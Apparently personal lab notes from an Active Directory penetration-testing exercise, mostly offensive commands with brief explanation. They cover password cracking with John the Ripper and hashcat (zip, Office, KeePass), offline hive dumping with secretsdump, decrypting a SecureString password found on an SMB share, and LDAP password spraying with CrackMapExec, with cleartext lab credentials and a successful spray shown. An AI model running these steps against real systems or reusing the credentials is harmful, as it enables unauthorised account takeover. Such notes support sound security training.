Using John the Ripper for cracking the zip password.
Commands used:
zip2john backup.zip > hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
office2john login.xlsx > hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Hashcat with rules
hashcat a.txt /usr/share/seclists/rockyou.txt -r /opt/active_directory/hashcat/rules/d3ad0ne.rule
Impacket
LOCAL (offline dump from saved SYSTEM, SAM and SECURITY hive files)
impacket-secretsdump -system systemic.txt -sam samantha.txt -security security.txt LOCAL
AES and Password file
Decrypting Credentials from an SMB Share
While exploring an SMB share, I stumbled upon two intriguing files: aes.key and passwd.txt. Intrigued by their names and potential contents, I decided to investigate further. My first thought was that aes.key could be an encryption key, and passwd.txt likely contained encrypted data, possibly a password. To explore this hypothesis, I used a PowerShell environment on my Commando VM.
I started by loading the content of aes.key into a variable:
$Key = Get-Content -Path C:\Users\jay\Desktop\aes.key
This reads the contents of the aes.key file and stores them in the $Key variable. Next, I loaded the encrypted message from passwd.txt:
$EncryptedMessage = Get-Content -Path "C:\Users\jay\Desktop\passwd.txt"
With both the key and the encrypted message in hand, I was ready to attempt decryption. PowerShell handles encrypted strings through its SecureString object. The ConvertTo-SecureString cmdlet converts encrypted data back into a SecureString, using the key I had just loaded:
$SecureStringPassword = $EncryptedMessage | ConvertTo-SecureString -Key $Key
After this command, the encrypted message is a SecureString, a special kind of string in PowerShell that is used for handling sensitive information.
However, SecureString objects are not directly readable. To view the decrypted password, I had to convert it back to a plain text string. This is a sensitive operation, since it involves handling the password in unencrypted form. For this I used the .NET class System.Runtime.InteropServices.Marshal, which provides methods for dealing with unmanaged memory:
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecureStringPassword)
$PlainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Ptr)
These commands copy the SecureString into an unmanaged BSTR, read it out as a plain text string, and then zero and free the allocated memory. Finally, I displayed the decrypted password:
echo $PlainTextPassword
The output revealed the decrypted password: to7oxaith2Vie9. This successful decryption confirmed that the files I found were indeed a key and an encrypted password, and that the latter could be recovered with PowerShell alone.
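The following is an added example, not part of the original notes: it shows the full round trip of the key-based SecureString format (ConvertFrom-SecureString -Key on the producing side, ConvertTo-SecureString -Key on the consuming side), so it is clear what aes.key and passwd.txt most likely are and why a key stored next to its ciphertext offers no protection. It assumes the key is stored as one decimal byte value per line (the layout Get-Content can coerce into [byte[]]) and that passwd.txt holds the single-line output of ConvertFrom-SecureString; the file names, the sample password and the Unprotect-KeyedSecureString function are this example's own.

```powershell
# Added example: round trip of ConvertFrom-SecureString -Key / ConvertTo-SecureString -Key.
# Files are written to a scratch directory; names mirror the ones found on the share.
$Dir = Join-Path ([System.IO.Path]::GetTempPath()) 'securestring-demo'
New-Item -ItemType Directory -Path $Dir -Force | Out-Null
$KeyPath = Join-Path $Dir 'aes.key'
$PwdPath = Join-Path $Dir 'passwd.txt'

# --- Producing side: how such a pair of files is typically created ---
# -Key accepts a 16, 24 or 32 byte array (AES-128/192/256).
$KeyBytes = New-Object byte[] 32
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($KeyBytes)
$KeyBytes | Set-Content -Path $KeyPath          # one decimal byte value per line

$Secret = ConvertTo-SecureString -String 'ExamplePassw0rd!' -AsPlainText -Force   # constructed sample
$Secret | ConvertFrom-SecureString -Key $KeyBytes | Set-Content -Path $PwdPath

# --- Consuming side: the same steps as in the notes, with the BSTR always wiped ---
function Unprotect-KeyedSecureString {
    param(
        [Parameter(Mandatory)] [string] $KeyFile,
        [Parameter(Mandatory)] [string] $CipherFile
    )
    # Get-Content yields strings; the explicit cast makes a malformed key file fail loudly.
    [byte[]] $Key = Get-Content -Path $KeyFile
    if ($Key.Length -notin 16, 24, 32) {
        throw "Key must be 16, 24 or 32 bytes; got $($Key.Length)"
    }
    $Encrypted = (Get-Content -Path $CipherFile -Raw).Trim()
    $Secure = $Encrypted | ConvertTo-SecureString -Key $Key

    $Ptr = [IntPtr]::Zero
    try {
        $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Secure)
        return [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Ptr)
    }
    finally {
        # Zero and free the unmanaged copy even if PtrToStringBSTR throws.
        if ($Ptr -ne [IntPtr]::Zero) {
            [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Ptr)
        }
    }
}

$Recovered = Unprotect-KeyedSecureString -KeyFile $KeyPath -CipherFile $PwdPath
if ($Recovered -ne 'ExamplePassw0rd!') { throw 'round trip failed' }
"Recovered: $Recovered"
```

Without -Key, ConvertFrom-SecureString protects the string with DPAPI, which ties it to the user and machine that created it; with -Key, anyone holding the key file can decrypt it anywhere, which is exactly the situation the two files on the share represent.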
Preparing for password spray
cme ldap 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users >> users.txt
awk '/LDAP/{print $5}' users.txt > only_users.txt
Password Spray
cme ldap 10.9.10.10 -u only_users.txt -p 'to7oxaith2Vie9'
LDAP 10.9.10.10 389 CYDC [+] cyber.local\Robert.Ortiz:to7oxaith2Vie9
KeePass kdbx
cp data.kdbx try.kdbx
keepass2john try.kdbx > try.txt
john --wordlist=/usr/share/wordlists/rockyou.txt try.txt
When the first few characters of the password are already known, use a hashcat mask attack instead.
Strip the leading "filename:" prefix that keepass2john adds so that the hash line starts with $keepass$ (saved here as try2.txt).
If the known part of the password is UA7cpa[#1!_*ZX and only the last character is uncertain, the mask becomes UA7cpa[#1!_*ZX?a, where ?a stands for every printable ASCII character.
Save the mask in pass.txt; hashcat reads a file given as the mask argument as a mask file, one mask per line. Run it with -a 3 (mask attack) and -m 13400 (KeePass hash mode):
hashcat -a 3 -m 13400 try2.txt pass.txt